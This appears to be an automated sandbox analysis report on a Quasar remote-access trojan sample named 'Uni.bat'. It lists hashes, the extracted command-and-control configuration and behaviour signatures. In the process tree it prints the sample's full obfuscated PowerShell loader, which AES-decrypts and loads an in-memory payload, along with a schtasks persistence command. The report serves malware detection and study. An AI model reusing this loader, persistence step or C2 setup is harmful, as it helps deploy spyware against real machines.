quasar | f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
24-06-2024 23:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

253KB
MD5

6116316574a1311a2e768ef21255430d
SHA1

684dec7251dbacf3e3b5a3cac0492df268f7f9a3
SHA256

f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
SHA512

daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
SSDEEP

3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM

Score

10^/10

quasar office04 spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.0.1

Botnet

Office04

wireless-boston.gl.at.ply.gg:41366

Mutex

QSR_MUTEX_W1ckGYHOGswdBegmKd

Attributes

encryption_key
QbY1WN4Surh1trMXzt97
install_name
system.exe
log_directory
Logs
reconnect_delay
3000
startup_key
system
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/3652-19-0x000002087DD00000-0x000002087DD5E000-memory.dmp family_quasar
Executes dropped EXE 2 IoCs

Processes:

Uni.bat.exesystem.exe

pid process

3652 Uni.bat.exe
4040 system.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com
Drops file in System32 directory 2 IoCs

Processes:

Uni.bat.exe

description ioc process

File created C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe
File opened for modification C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

1464 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

Uni.bat.exesystem.exe

pid process

3652 Uni.bat.exe
3652 Uni.bat.exe
4040 system.exe
4040 system.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Uni.bat.exesystem.exe

description pid process

Token: SeDebugPrivilege 3652 Uni.bat.exe
Token: SeDebugPrivilege 4040 system.exe

resource	yara_rule
behavioral2/memory/3652-19-0x000002087DD00000-0x000002087DD5E000-memory.dmp	family_quasar

pid	process
3652	Uni.bat.exe
4040	system.exe

flow	ioc
10	ip-api.com

description	ioc	process
File created	C:\Windows\SysWOW64\SubDir\system.exe	Uni.bat.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\system.exe	Uni.bat.exe

pid	process
1464	schtasks.exe

pid	process
3652	Uni.bat.exe
3652	Uni.bat.exe
4040	system.exe
4040	system.exe

description	pid	process
Token: SeDebugPrivilege	3652	Uni.bat.exe
Token: SeDebugPrivilege	4040	system.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.exenet.exeUni.bat.exe

description	pid	process	target process
PID 2372 wrote to memory of 1184	2372	cmd.exe	net.exe
PID 2372 wrote to memory of 1184	2372	cmd.exe	net.exe
PID 1184 wrote to memory of 3816	1184	net.exe	net1.exe
PID 1184 wrote to memory of 3816	1184	net.exe	net1.exe
PID 2372 wrote to memory of 3652	2372	cmd.exe	Uni.bat.exe
PID 2372 wrote to memory of 3652	2372	cmd.exe	Uni.bat.exe
PID 3652 wrote to memory of 1464	3652	Uni.bat.exe	schtasks.exe
PID 3652 wrote to memory of 1464	3652	Uni.bat.exe	schtasks.exe
PID 3652 wrote to memory of 4040	3652	Uni.bat.exe	system.exe
PID 3652 wrote to memory of 4040	3652	Uni.bat.exe	system.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2372

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1464

C:\Windows\SysWOW64\SubDir\system.exe
"C:\Windows\SysWOW64\SubDir\system.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvo2d50f.kpt.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3652-17-0x000002087DCD0000-0x000002087DD04000-memory.dmp

Filesize
208KB

Download
memory/3652-14-0x000002087DCA0000-0x000002087DCC2000-memory.dmp

Filesize
136KB

Download
memory/3652-15-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmp

Filesize
10.8MB

Download
memory/3652-16-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmp

Filesize
10.8MB

Download
memory/3652-4-0x00007FFC50DA3000-0x00007FFC50DA5000-memory.dmp

Filesize
8KB

Download
memory/3652-19-0x000002087DD00000-0x000002087DD5E000-memory.dmp

Filesize
376KB

Download
memory/3652-20-0x000002087DDB0000-0x000002087DDC2000-memory.dmp

Filesize
72KB

Download
memory/3652-21-0x000002087E8E0000-0x000002087E91C000-memory.dmp

Filesize
240KB

Download
memory/3652-38-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmp

Filesize
10.8MB

Download
memory/4040-36-0x0000019A6C210000-0x0000019A6C254000-memory.dmp

Filesize
272KB

Download
memory/4040-37-0x0000019A6C2E0000-0x0000019A6C356000-memory.dmp

Filesize
472KB

Download